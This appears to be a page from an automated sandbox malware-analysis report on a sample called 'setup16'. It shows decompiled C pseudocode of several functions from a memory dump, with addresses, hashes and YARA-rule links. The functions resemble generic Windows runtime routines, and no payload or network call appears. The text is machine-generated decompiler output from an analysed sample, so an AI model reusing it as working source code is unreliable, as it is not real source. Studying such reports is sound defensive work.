                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A04A2C Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                                                                                        			E04A04A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x4abd360 ^ _t62;
				_v8 =  *0x4abd360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E049E2280(_t26, 0x4ab8608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E049DFFB0(_t41, _t51, 0x4ab8608);
						L2:
						 *0x4abb1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E04A0B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E049E2280(_t28, 0x4ab8608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E049DFFB0(_t42, _t53, 0x4ab8608);
							if(_t53 != 0) {
								L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E049DFFB0(_t41, _t51, 0x4ab8608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}
























                                                                                                                                                                                                        0x04a04a2c
                                                                                                                                                                                                        0x04a04a34
                                                                                                                                                                                                        0x04a04a3c
                                                                                                                                                                                                        0x04a04a3e
                                                                                                                                                                                                        0x04a04a48
                                                                                                                                                                                                        0x04a04a4b
                                                                                                                                                                                                        0x04a04a4d
                                                                                                                                                                                                        0x04a04a51
                                                                                                                                                                                                        0x04a04a9c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a04aa3
                                                                                                                                                                                                        0x04a04aa8
                                                                                                                                                                                                        0x04a04aad
                                                                                                                                                                                                        0x04a04ab1
                                                                                                                                                                                                        0x04a04ade
                                                                                                                                                                                                        0x04a04ae3
                                                                                                                                                                                                        0x04a04a5a
                                                                                                                                                                                                        0x04a04a62
                                                                                                                                                                                                        0x04a04a6a
                                                                                                                                                                                                        0x04a04a6e
                                                                                                                                                                                                        0x04a3f203
                                                                                                                                                                                                        0x04a04a84
                                                                                                                                                                                                        0x04a04a88
                                                                                                                                                                                                        0x04a04a89
                                                                                                                                                                                                        0x04a04a8a
                                                                                                                                                                                                        0x04a04a95
                                                                                                                                                                                                        0x04a04a95
                                                                                                                                                                                                        0x04a04a79
                                                                                                                                                                                                        0x04a04a80
                                                                                                                                                                                                        0x04a04af2
                                                                                                                                                                                                        0x04a04af4
                                                                                                                                                                                                        0x04a04af9
                                                                                                                                                                                                        0x04a04aff
                                                                                                                                                                                                        0x04a04b01
                                                                                                                                                                                                        0x04a04b03
                                                                                                                                                                                                        0x04a04b08
                                                                                                                                                                                                        0x04a3f20a
                                                                                                                                                                                                        0x04a3f212
                                                                                                                                                                                                        0x04a3f216
                                                                                                                                                                                                        0x04a3f216
                                                                                                                                                                                                        0x04a04b08
                                                                                                                                                                                                        0x04a04b13
                                                                                                                                                                                                        0x04a04b1a
                                                                                                                                                                                                        0x04a3f229
                                                                                                                                                                                                        0x04a3f229
                                                                                                                                                                                                        0x04a04b1a
                                                                                                                                                                                                        0x04a04a82
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a04a82
                                                                                                                                                                                                        0x04a04ab7
                                                                                                                                                                                                        0x04a04acd
                                                                                                                                                                                                        0x04a04acd
                                                                                                                                                                                                        0x04a04ad5
                                                                                                                                                                                                        0x04a04ada
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a04ada
                                                                                                                                                                                                        0x04a04ac2
                                                                                                                                                                                                        0x04a04acb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a04acb
                                                                                                                                                                                                        0x04a04a53
                                                                                                                                                                                                        0x04a04a53
                                                                                                                                                                                                        0x04a04a58
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 62828a505ad4f71f437203768cde48ae890727285cc4a48423b8cf10b6bb3cc9
                                                                                                                                                                                                        • Instruction ID: 6235bd737e330aeb1d6dbec16886692c49b71812979db19427c3253c0c9e9d14
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 62828a505ad4f71f437203768cde48ae890727285cc4a48423b8cf10b6bb3cc9
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 16310232605710EFD721EF58D980B2ABBA8FFC9714F44896DEA560B281D774F800CB85
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049FE730 Relevance: .1, Instructions: 89COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 74%
                                                                                                                                                                                                        			E049FE730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E04A09670() < 0) {
					L04A1DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x4ab7b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L049E4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M049FE810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















                                                                                                                                                                                                        0x049fe730
                                                                                                                                                                                                        0x049fe736
                                                                                                                                                                                                        0x049fe738
                                                                                                                                                                                                        0x049fe73d
                                                                                                                                                                                                        0x049fe73e
                                                                                                                                                                                                        0x049fe740
                                                                                                                                                                                                        0x049fe749
                                                                                                                                                                                                        0x049fe765
                                                                                                                                                                                                        0x049fe76a
                                                                                                                                                                                                        0x049fe76b
                                                                                                                                                                                                        0x049fe76c
                                                                                                                                                                                                        0x049fe76d
                                                                                                                                                                                                        0x049fe76e
                                                                                                                                                                                                        0x049fe76f
                                                                                                                                                                                                        0x049fe775
                                                                                                                                                                                                        0x049fe777
                                                                                                                                                                                                        0x049fe77e
                                                                                                                                                                                                        0x04a3b675
                                                                                                                                                                                                        0x049fe784
                                                                                                                                                                                                        0x049fe784
                                                                                                                                                                                                        0x049fe789
                                                                                                                                                                                                        0x049fe7a8
                                                                                                                                                                                                        0x049fe7ac
                                                                                                                                                                                                        0x049fe807
                                                                                                                                                                                                        0x049fe7ae
                                                                                                                                                                                                        0x049fe7ae
                                                                                                                                                                                                        0x049fe7b1
                                                                                                                                                                                                        0x049fe7b4
                                                                                                                                                                                                        0x049fe7b9
                                                                                                                                                                                                        0x049fe7c0
                                                                                                                                                                                                        0x049fe7c4
                                                                                                                                                                                                        0x049fe7ca
                                                                                                                                                                                                        0x049fe7cc
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049fe7d3
                                                                                                                                                                                                        0x049fe7d6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049fe7ff
                                                                                                                                                                                                        0x049fe802
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049fe7f9
                                                                                                                                                                                                        0x049fe7fc
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049fe7f3
                                                                                                                                                                                                        0x049fe7f6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049fe7ed
                                                                                                                                                                                                        0x049fe7f0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049fe7e7
                                                                                                                                                                                                        0x049fe7ea
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a3b685
                                                                                                                                                                                                        0x04a3b688
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a3b682
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049fe7cc
                                                                                                                                                                                                        0x049fe7d9
                                                                                                                                                                                                        0x049fe7dc
                                                                                                                                                                                                        0x049fe7de
                                                                                                                                                                                                        0x049fe7de
                                                                                                                                                                                                        0x049fe7ac
                                                                                                                                                                                                        0x049fe7e4
                                                                                                                                                                                                        0x049fe74b
                                                                                                                                                                                                        0x049fe751
                                                                                                                                                                                                        0x049fe759
                                                                                                                                                                                                        0x049fe761
                                                                                                                                                                                                        0x049fe761

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 4bbc00fc33ce55ecbe05bed827202f89502ec46e4da5552e1243c3905926c83f
                                                                                                                                                                                                        • Instruction ID: a06631ff4798e88b33c73516b35cfbe1471fc5d07cd064f10e3167f7fe973c63
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4bbc00fc33ce55ecbe05bed827202f89502ec46e4da5552e1243c3905926c83f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F3318D75A14249EFDB04CF18D841B9ABBE9FB58314F148666FA04CB351E631FD80CBA0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049FBC2C Relevance: .1, Instructions: 88COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 67%
                                                                                                                                                                                                        			E049FBC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x4ab6100; // 0x5a
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E049E2280(0xd, 0x1758f1a0);
				_t41 =  *0x4ab60f8; // 0x0
				if(_t41 != 0) {
					 *0x4ab60f8 =  *_t41;
					 *0x4ab60fc =  *0x4ab60fc + 0xffff;
				}
				E049DFFB0(_t41, 0x800, 0x1758f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x4ab60f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L049E4620(0x4ab6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x4ab6100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










                                                                                                                                                                                                        0x049fbc36
                                                                                                                                                                                                        0x049fbc42
                                                                                                                                                                                                        0x049fbc45
                                                                                                                                                                                                        0x049fbc4a
                                                                                                                                                                                                        0x049fbd35
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049fbc50
                                                                                                                                                                                                        0x049fbc50
                                                                                                                                                                                                        0x049fbc58
                                                                                                                                                                                                        0x049fbc5a
                                                                                                                                                                                                        0x049fbc60
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a3a4f2
                                                                                                                                                                                                        0x04a3a4f6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a3a4fc
                                                                                                                                                                                                        0x049fbc79
                                                                                                                                                                                                        0x049fbc7e
                                                                                                                                                                                                        0x049fbc86
                                                                                                                                                                                                        0x049fbd16
                                                                                                                                                                                                        0x049fbd20
                                                                                                                                                                                                        0x049fbd20
                                                                                                                                                                                                        0x049fbc8d
                                                                                                                                                                                                        0x049fbc94
                                                                                                                                                                                                        0x049fbcbd
                                                                                                                                                                                                        0x049fbcca
                                                                                                                                                                                                        0x049fbccb
                                                                                                                                                                                                        0x049fbccc
                                                                                                                                                                                                        0x049fbccd
                                                                                                                                                                                                        0x049fbcce
                                                                                                                                                                                                        0x049fbcd4
                                                                                                                                                                                                        0x049fbcea
                                                                                                                                                                                                        0x049fbcee
                                                                                                                                                                                                        0x049fbcf2
                                                                                                                                                                                                        0x049fbd00
                                                                                                                                                                                                        0x049fbd04
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049fbc96
                                                                                                                                                                                                        0x049fbcab
                                                                                                                                                                                                        0x049fbcaf
                                                                                                                                                                                                        0x049fbd2c
                                                                                                                                                                                                        0x049fbd2c
                                                                                                                                                                                                        0x049fbd09
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049fbd09
                                                                                                                                                                                                        0x049fbcb1
                                                                                                                                                                                                        0x049fbcb5
                                                                                                                                                                                                        0x049fbcbb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049fbcbb

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: c75cf6d1c6a81c2196ef5fcb87d84ba19d59b74e1c8e8eefb4cb3cd8c19c3a9f
                                                                                                                                                                                                        • Instruction ID: 862c21f2aa69dc3b4e25f12dcbaea73c9cffc71224d799cde23ab59a750223f2
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c75cf6d1c6a81c2196ef5fcb87d84ba19d59b74e1c8e8eefb4cb3cd8c19c3a9f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: D531F276600A159BEB11DF58D8807A673A8FF18315F044479EE45DB202E778FD06CBC1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049F1DB5 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 60%
                                                                                                                                                                                                        			E049F1DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E049EF460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L049E4620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E049EF460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                                                                                                                                                                                                        0x049f1dc2
                                                                                                                                                                                                        0x049f1dc5
                                                                                                                                                                                                        0x049f1dc7
                                                                                                                                                                                                        0x049f1dcc
                                                                                                                                                                                                        0x049f1dce
                                                                                                                                                                                                        0x049f1dd6
                                                                                                                                                                                                        0x049f1ddf
                                                                                                                                                                                                        0x049f1de0
                                                                                                                                                                                                        0x049f1de1
                                                                                                                                                                                                        0x049f1de5
                                                                                                                                                                                                        0x049f1de8
                                                                                                                                                                                                        0x049f1def
                                                                                                                                                                                                        0x049f1df0
                                                                                                                                                                                                        0x049f1df6
                                                                                                                                                                                                        0x049f1df7
                                                                                                                                                                                                        0x049f1dfe
                                                                                                                                                                                                        0x049f1e1a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f1e0b
                                                                                                                                                                                                        0x049f1e12
                                                                                                                                                                                                        0x049f1e12
                                                                                                                                                                                                        0x049f1e00
                                                                                                                                                                                                        0x049f1e00
                                                                                                                                                                                                        0x049f1e05
                                                                                                                                                                                                        0x049f1e1e
                                                                                                                                                                                                        0x049f1e23
                                                                                                                                                                                                        0x04a3570f
                                                                                                                                                                                                        0x04a35713
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a35719
                                                                                                                                                                                                        0x04a35719
                                                                                                                                                                                                        0x049f1e2c
                                                                                                                                                                                                        0x049f1e2d
                                                                                                                                                                                                        0x049f1e2e
                                                                                                                                                                                                        0x049f1e2f
                                                                                                                                                                                                        0x049f1e31
                                                                                                                                                                                                        0x049f1e32
                                                                                                                                                                                                        0x049f1e35
                                                                                                                                                                                                        0x049f1e3d
                                                                                                                                                                                                        0x04a35723
                                                                                                                                                                                                        0x04a3573d
                                                                                                                                                                                                        0x04a3573d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a35723
                                                                                                                                                                                                        0x049f1e49
                                                                                                                                                                                                        0x049f1e4e
                                                                                                                                                                                                        0x049f1e4e
                                                                                                                                                                                                        0x049f1e09
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                                                                                                                                                        • Instruction ID: ed079fb80342607c7a3c01c440b0e5c61497c90b488f1a95c0ac4f30a257d1d6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: D7218D72A00118FFD725CF99CC85EAABBBDEF85744F114465EA0197220EA30BE01DBE0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049C9100 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 76%
                                                                                                                                                                                                        			E049C9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x4a9f6e8);
				E04A1D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E04A988F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E04A1D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x4ab86c0; // 0xa707b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x4ab86b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E049E2280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E04A988F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E04A0AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x4abb1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x4ab84c0;
										if(_t69 >=  *0x4ab84c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E04A99063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E049C922A(_t82);
							_t53 = E049E7D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E04A98B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x4ab86c0; // 0xa707b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x4ab86b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x4ab86bc;
										_t72 = 0x4ab86b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E049C9240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x4ab86c4;
									_t72 = 0x4ab86c0;
									L18:
									E049F9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
